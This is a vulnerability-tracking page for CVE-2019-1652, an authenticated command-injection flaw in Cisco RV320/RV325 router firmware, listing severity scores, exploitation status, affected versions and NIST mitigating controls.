Cyber Resilience

CVE-2019-1652

HighCISA KEVActive ExploitationEUVD ExploitedPublic PoCRCE

Published: 24 January 2019

Published
24 January 2019
Modified
28 October 2025
KEV Added
03 March 2022
Patch
CVSS Score v3.1 7.2 CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
EPSS Score 0.9273 99.8th percentile
Risk Priority 90 60% EPSS · 20% KEV · 20% CVSS

Summary

CVE-2019-1652 is a high-severity Improper Input Validation (CWE-20) vulnerability in Cisco Rv320 Firmware. Its CVSS base score is 7.2 (High).

Operationally, ranked in the top 0.2% of CVEs by exploit likelihood; CISA has added it to the Known Exploited Vulnerabilities catalog; a public proof-of-concept is referenced.

The strongest mitigations our analysis identified are NIST 800-53 SI-10 (Information Input Validation) and SI-2 (Flaw Remediation).

Deeper analysis

A vulnerability in the web-based management interface of Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN Routers allows an authenticated remote attacker with administrative privileges to execute arbitrary commands on the underlying Linux shell as root. The issue stems from improper validation of user-supplied input (CWE-20 and CWE-78) and is exploitable by sending crafted HTTP POST requests to the management interface. It carries a CVSS 3.1 base score of 7.2.

An attacker who already possesses administrative credentials on an affected device can leverage the flaw to run commands with root privileges, potentially compromising the router's configuration, traffic, or connected networks. Public exploit code demonstrating command injection against these models has been published on Packet Storm and Seclists.

Cisco has released firmware updates that address the vulnerability. The listed references consist primarily of technical disclosures and proof-of-concept material rather than official mitigation guidance.

EU & UK References

Vulnerability details

A vulnerability in the web-based management interface of Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN Routers could allow an authenticated, remote attacker with administrative privileges on an affected device to execute arbitrary commands. The vulnerability is due…

more

to improper validation of user-supplied input. An attacker could exploit this vulnerability by sending malicious HTTP POST requests to the web-based management interface of an affected device. A successful exploit could allow the attacker to execute arbitrary commands on the underlying Linux shell as root. Cisco has released firmware updates that address this vulnerability.

CWE(s)
KEV Date Added
03 March 2022

Related Threats

No named actor attribution yet. ATT&CK technique mapping in progress for this CVE.

Affected Assets

cisco
rv320 firmware
1.4.2.15 — 1.4.2.22
cisco
rv325 firmware
1.4.2.15 — 1.4.2.22

Mitigating Controls

Mitigating Controls (NIST 800-53 r5) AI

prevent

Directly requires validation of user-supplied input on the web management interface, blocking the crafted HTTP POST requests that trigger command injection.

prevent

Mandates timely application of vendor firmware updates that remediate the improper input validation flaw (CWE-20/CWE-78).

prevent

Restricts the router to only the necessary management functions and interfaces, reducing the attack surface available to an authenticated administrator.

References